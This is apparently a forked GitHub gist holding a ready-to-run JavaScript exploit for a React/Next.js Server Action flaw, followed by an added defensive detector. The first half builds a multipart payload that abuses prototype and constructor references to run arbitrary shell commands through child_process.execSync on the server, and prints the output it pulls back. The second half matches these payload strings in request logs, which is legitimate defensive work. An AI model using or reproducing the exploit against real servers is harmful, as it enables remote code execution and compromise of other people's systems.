@razzul
Forked from akshaymarch7/exploit1.js
Created December 16, 2025 09:12
React Critical Vulnerability (CVSS 10.0) - exploit1 code
(async () => {
// === CONFIGURATION ===
const cmd = "touch iWasHere"; // The command you want to run
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;
const boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad";
// 2. Build the multipart/form-data body manually
const bodyParts = [
`--${boundary}`,
'Content-Disposition: form-data; name="0"',
'',
payloadJson,
`--${boundary}`,
'Content-Disposition: form-data; name="1"',
'',
'"$@0"',
`--${boundary}`,
'Content-Disposition: form-data; name="2"',
'',
'[]',
`--${boundary}--`,
''
].join('\r\n');
try {
// 3. Send the request
const res = await fetch(targetUrl, {
method: 'POST',
headers: {
'Next-Action': 'x', // Required to trigger Server Action logic
'X-Nextjs-Request-Id': '7a3f9c1e',
'X-Nextjs-Html-Request-ld': '9bK2mPaRtVwXyZ3S@!sT7u',
'Content-Type': `multipart/form-data; boundary=${boundary}`,
'X-Nextjs-Html-Request-Id': 'SSTMXm7OJ_g0Ncx6jpQt9'
},
body: bodyParts
});
const responseText = await res.text();
// 4. Extract and Decode the output
// The server returns the output inside the "digest" field of the error
const digestMatch = responseText.match(/"digest"\s*:\s*"((?:[^"\\]|\\.)*)"/);
if (digestMatch && digestMatch[1]) {
let rawBase64 = digestMatch[1];
// Clean JSON escaping
let cleanBase64 = JSON.parse(`"${rawBase64}"`);
// Decode Base64 (handling UTF-8 correctly)
const decodedStr = new TextDecoder().decode(
Uint8Array.from(atob(cleanBase64), c => c.charCodeAt(0))
);
console.log("%c[+] Exploit Successful!", "color: green; font-weight: bold; font-size: 14px;");
console.log("Command Output:\n----------------\n" + decodedStr + "\n----------------");
} else {
console.log("%c[-] Exploit Failed", "color: red; font-weight: bold;");
console.log("Could not find 'digest' in response. Raw response preview:", responseText.substring(0, 200));
}
} catch (e) {
console.error("Request Error:", e);
}
})();
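
For defenders, the request shape above can be matched at a proxy or in request logs. The following is an added example, not part of the gist or of React/Next.js: it parses a multipart body and flags the reference strings this payload relies on. The function names, marker list and sample requests are assumptions constructed for illustration, and the matching is a string-level heuristic derived only from the payload shown on this page.

```javascript
// Added example, not part of the gist: flag Server Action requests whose
// multipart fields contain the reference strings used by the payload above.
const MARKERS = [
  { id: "proto-ref", re: /"\$[^"]*:__proto__[:"]/ },             // "$1:__proto__:then"
  { id: "ctor-ref", re: /"\$[^"]*:constructor:constructor"/ },   // "$1:constructor:constructor"
  { id: "forged-chunk", re: /"status"\s*:\s*"resolved_model"/ }, // client-supplied chunk state
  { id: "response-override", re: /"_response"\s*:\s*\{/ },       // client-supplied _response object
];

// Split a multipart/form-data body into { name, value } fields.
function parseMultipart(body, boundary) {
  const fields = [];
  for (const chunk of body.split(`--${boundary}`)) {
    const sep = chunk.indexOf("\r\n\r\n");
    if (sep === -1) continue; // preamble or closing "--" marker
    const name = /name="([^"]*)"/.exec(chunk.slice(0, sep));
    fields.push({ name: name ? name[1] : "", value: chunk.slice(sep + 4).replace(/\r\n$/, "") });
  }
  return fields;
}

// Returns a list of findings; an empty list means nothing matched.
function inspectRequest({ headers, body }) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  if (!("next-action" in h)) return []; // only Server Action calls are in scope
  const m = /boundary=([^;]+)/.exec(h["content-type"] || "");
  if (!m) return [];
  const findings = [];
  for (const { name, value } of parseMultipart(body, m[1])) {
    for (const { id, re } of MARKERS) {
      if (re.test(value)) findings.push(`${id} in field "${name}"`);
    }
  }
  return findings;
}

// Constructed sample requests (hypothetical; the suspect body is defanged).
const build = (b, fields) => fields.map(([n, v]) =>
  `--${b}\r\nContent-Disposition: form-data; name="${n}"\r\n\r\n${v}\r\n`).join("") + `--${b}--\r\n`;
const hdrs = (b) => ({ "Next-Action": "x", "Content-Type": `multipart/form-data; boundary=${b}` });
const BENIGN = { headers: hdrs("B1"), body: build("B1", [["0", '["$K1"]'], ["1_name", "Ada"]]) };
const SUSPECT = { headers: hdrs("B2"), body: build("B2", [
  ["0", '{"then":"$1:__proto__:then","status":"resolved_model","_response":{"_prefix":"DEFANGED","_formData":{"get":"$1:constructor:constructor"}}}'],
  ["1", '"$@0"'],
]) };

console.log(inspectRequest(BENIGN));
console.log(inspectRequest(SUSPECT));
```

A match is a signal for triage rather than proof of compromise; a payload that encodes these strings differently would not be caught by this list.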